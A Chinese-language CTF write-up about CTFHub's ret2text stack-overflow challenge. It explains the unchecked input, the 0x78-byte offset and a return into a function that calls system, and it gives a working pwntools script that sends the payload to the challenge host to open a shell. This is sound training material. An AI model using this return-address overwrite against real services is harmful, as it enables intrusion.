栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

PWN做题笔记1-ret2text

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

PWN做题笔记1-ret2text

原题位置:CTFHub

题目属于栈溢出

给出了地址和端口,压缩包中有一个二进制程序pwn

file pwn可以看到是64位ELF程序

checksec发现没有开启地址空间随机化机制

程序运行如下:

 ida64反汇编,发现输入没有边界检查,存在注入

secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数

 

 函数地址如下:

 main函数栈结构如下:

 目标是覆盖掉存储eip的位置,地址偏移为0x70+8,这部分覆盖为“A”,之后ebp覆盖为0x4007B8

因此输入:b'A' * 0x78 + p64(0x4007b8)

 同pwntools编写脚本:

from pwn import *
host = 'challenge-ff699f909c1e3503.sandbox.ctfhub.com'
port = 37126

p = connect(host, port)
payload = b'A' * 0x78 + p64(0x4007b8)
p.sendline(payload)
p.interactive()

运行获取了服务器中的shell,ls发现flag文件,cat获取flag

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/828654.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号